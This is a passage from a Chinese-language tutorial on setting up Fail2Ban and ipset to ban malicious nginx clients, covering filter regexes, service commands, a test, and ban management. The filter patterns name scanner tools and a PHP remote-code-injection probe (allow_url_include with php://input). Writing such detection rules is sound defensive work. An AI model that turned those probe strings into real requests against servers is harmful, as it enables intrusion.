    ^<HOST> - - \[.*\] "OPTIONS / HTTP/1\.0".*"-" "-" "-"$
    ^<HOST> - -.* "Mozilla/5\.0 zgrab/0\.x"
    ^<HOST> - .*"(GET|POST).*allow_url_include.*auto_prepend_file=php://input.*HTTP
    ^<HOST> - .*"[^"]*" [0-9]{3} .* "-" "libredtail-http"

重启 Fail2Ban 生效

systemctl enable --now fail2ban
systemctl status fail2ban

## 或者重新加载配置文件
fail2ban-client reload

启动成功以后iptables会有相应规则停止 fail2ban 服务这条规会自动清除

iptables -L -n

Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --  0.0.0.0/0            0.0.0.0/0            match-set nginx-malicious src

## 查看 ipset 会自定创建 nginx-malicious 分组 
ipset  list -name

nginx-malicious  ## 这个是自动创建的分组

结果验证

查看 IP 是否封进去了，随便找一台机器执行下面的命令查看 fail2ban 日志或者在词执行这个命令会提示超时。

curl -H "User-Agent: sqlmap" https://demo.com/

## 查看都禁用了那些ip fail2ban命令也可以查看下面会说
ipset list nginx-malicious

Fail2Ban 常用命令

列出所有运行中的 jail：

fail2ban-client status

示例输出（假设你看到一个 jail）：

Status
|- Number of jail:      1
`- Jail list:           nginx-malicious

Fail2Ban 会管理 ipset 集合，建议用 Fail2Ban 自带命令来操作，保证状态同步。

手动封禁 IP

fail2ban-client set nginx-malicious banip 1.2.3.4

手动解封 IP

fail2ban-client set nginx-malicious unbanip 1.2.3.4

测试 fail2ban 正则规则是否有问题

## 常用参数  --print-all-missed   输出未匹配的日志
##          --print-all-matched  输出匹配的日志 加到最后面即可
fail2ban-regex /var/log/nginx/access.log /etc/fail2ban/filter.d/nginx-malicious.conf

查看当前封禁的 IP 列表

通过 ipset 查看：

ipset list f2b-nginx-malicious

通过 Fail2Ban 查看：

fail2ban-client status nginx-malicious

输出里会列出当前被封禁的 IP。

这个fail2ban服务有时候不会自动封禁ip 比如用命令清空nginx 日志的时候fail2ban会有问题这时候执行下面的操作

systemctl stop fail2ban

# 此操作会清空所有封禁的ip列表 
## 注意备份已经封禁的IP列表  用 ipset list 输出以后保存到文件里面
rm -rf /var/lib/fail2ban/fail2ban.sqlite3
rm -rf /var/run/fail2ban/

systemctl start fail2ban